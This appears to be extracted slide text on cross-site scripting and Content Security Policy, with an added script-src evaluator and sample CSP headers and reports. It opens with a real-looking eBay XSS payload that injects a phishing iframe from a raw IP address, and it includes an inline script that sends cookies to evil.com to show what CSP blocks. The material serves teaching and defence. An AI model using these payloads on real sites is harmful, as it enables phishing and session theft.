http://ebay.com/link/?nav=webview&url= javascript:document.write%28%27%3Ciframe%20src=%22http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html%22%20width=%221500%22%20height=%221000%22%3E%27%29
@thehackernews.com 2016
exploit.js
Confirmed vulnerable: WordPress 4.2, 4.1.2, 4.1.1, 3.9.3.
Tested with MySQL versions 5.1.53 and 5.5.41.
../wp-content/plugins/hello.php
"XSS is found around two thirds of all applications"
CSP defines the Content-Security-Policy HTTP header, which lets a site declare a whitelist of the sources the browser may load trusted content from; anything outside that list is refused.
HTTP response header:
Content-Security-Policy: script-src 'self' code.jquery.com
HTML (an injected inline script that tries to send the cookie to a third-party host):
<script> new Image().src = 'http://evil.com/?cookie=' + document.cookie; </script>
Browser console:
Refused to execute inline script because it violates the following Content Security Policy directive: "script-src 'self' code.jquery.com".
CSP level 2
HTTP response header (per-response nonce):
Content-Security-Policy: script-src 'nonce-EDNnf03nceIOfn39fn3e9h3sdfa'
HTML:
<script nonce="EDNnf03nceIOfn39fn3e9h3sdfa"> // Some inline code I can't remove yet, but need to asap. </script>
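To make the two behaviours above concrete (the inline script refused under `script-src 'self' code.jquery.com`, the nonce'd script allowed under `script-src 'nonce-...'`), here is an added example that is not part of the original slides: a small evaluator for the script-src directive. The page origin http://example.org is a constructed value, and only 'self', 'none', 'unsafe-inline', 'nonce-...' and host expressions (optional scheme, optional `*.` wildcard, no port matching) are modelled; it is not a full CSP implementation.

```javascript
// Added example, not part of the original slides: a small evaluator for the
// script-src directive. It shows why the inline cookie-stealing script is
// refused under "script-src 'self' code.jquery.com" and why the nonce'd
// script is allowed under "script-src 'nonce-...'". Only 'self', 'none',
// 'unsafe-inline', 'nonce-...' and host expressions (optional scheme,
// optional *. wildcard, no port matching) are modelled; it is not a full CSP.

// Parse "script-src 'self' code.jquery.com; report-uri /x" into
// { "script-src": ["'self'", "code.jquery.com"], "report-uri": ["/x"] }.
function parsePolicy(policy) {
  const directives = {};
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...values] = tokens;
    directives[name.toLowerCase()] = values;
  }
  return directives;
}

// Does a host-source expression such as "code.jquery.com",
// "https://cdn.example.org" or "*.example.org" match the script's URL?
function hostSourceMatches(expr, scriptUrl) {
  let hostPart = expr;
  const schemeIdx = expr.indexOf('://');
  if (schemeIdx !== -1) {
    // An explicit scheme in the expression must match the script's scheme.
    if (expr.slice(0, schemeIdx).toLowerCase() + ':' !== scriptUrl.protocol) return false;
    hostPart = expr.slice(schemeIdx + 3);
  }
  const host = hostPart.split('/')[0].split(':')[0].toLowerCase(); // drop path and port
  const target = scriptUrl.hostname;
  if (host.startsWith('*.')) {
    const suffix = host.slice(1); // ".example.org"
    return target.endsWith(suffix) && target.length > suffix.length;
  }
  return host === target;
}

// Decide whether a script may run under `policy` on a page at `pageOrigin`.
// `script` is { inline: true, nonce? } or { src: 'https://...', nonce? }.
// Returns { allowed, reason }; the blocked reasons mirror Chrome's console text.
function evaluateScriptSrc(policy, pageOrigin, script) {
  const directives = parsePolicy(policy);
  const sources = directives['script-src'] || directives['default-src'];
  if (!sources) return { allowed: true, reason: 'no script-src or default-src directive' };
  const directiveText = `script-src ${sources.join(' ')}`;

  // CSP level 2: a matching nonce allows the script regardless of its origin.
  if (script.nonce && sources.includes(`'nonce-${script.nonce}'`)) {
    return { allowed: true, reason: 'nonce matched' };
  }
  if (script.inline) {
    // 'unsafe-inline' is ignored once the directive carries a nonce (level 2 rule).
    const hasNonce = sources.some(s => s.startsWith("'nonce-"));
    if (sources.includes("'unsafe-inline'") && !hasNonce) {
      return { allowed: true, reason: "'unsafe-inline' present" };
    }
    return {
      allowed: false,
      reason: `Refused to execute inline script because it violates the following Content Security Policy directive: "${directiveText}".`,
    };
  }
  const scriptUrl = new URL(script.src);
  const selfOrigin = new URL(pageOrigin).origin;
  for (const src of sources) {
    if (src === "'self'" && scriptUrl.origin === selfOrigin) {
      return { allowed: true, reason: "'self' matched" };
    }
    if (!src.startsWith("'") && hostSourceMatches(src, scriptUrl)) {
      return { allowed: true, reason: `host source ${src} matched` };
    }
  }
  return {
    allowed: false,
    reason: `Refused to load the script '${script.src}' because it violates the following Content Security Policy directive: "${directiveText}".`,
  };
}

// Stand-alone demo with the two policies from the slides; the page origin is a constructed value.
const page = 'http://example.org';
console.log(evaluateScriptSrc("script-src 'self' code.jquery.com", page, { inline: true }).reason);
console.log(evaluateScriptSrc("script-src 'nonce-EDNnf03nceIOfn39fn3e9h3sdfa'", page,
  { inline: true, nonce: 'EDNnf03nceIOfn39fn3e9h3sdfa' }).reason);
```

Running it prints the same refusal text the console shows above for the first policy and "nonce matched" for the second; note that under the nonce policy an inline script without the nonce, or with a guessed one, is still refused, which is why the nonce must be unpredictable and regenerated per response.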
HTTP response header (violations are POSTed to the report-uri endpoint):
Content-Security-Policy: default-src 'self'; report-uri /my_amazing_csp_report_parser;
Report body the browser POSTs to that endpoint (JSON):
{
  "csp-report": {
    "document-uri": "http://example.org/page.html",
    "referrer": "http://evil.example.com/",
    "blocked-uri": "http://evil.example.com/evil.js",
    "violated-directive": "script-src 'self' https://apis.google.com",
    "original-policy": "script-src 'self' https://apis.google.com; report-uri http://example.org/my_amazing_csp_report_parser"
  }
}
Enable CSP as early as possible, starting in development mode:
HTTP response header (report-only: violations are reported but nothing is blocked):
Content-Security-Policy-Report-Only: default-src 'self'; report-uri /my_amazing_csp_report_parser;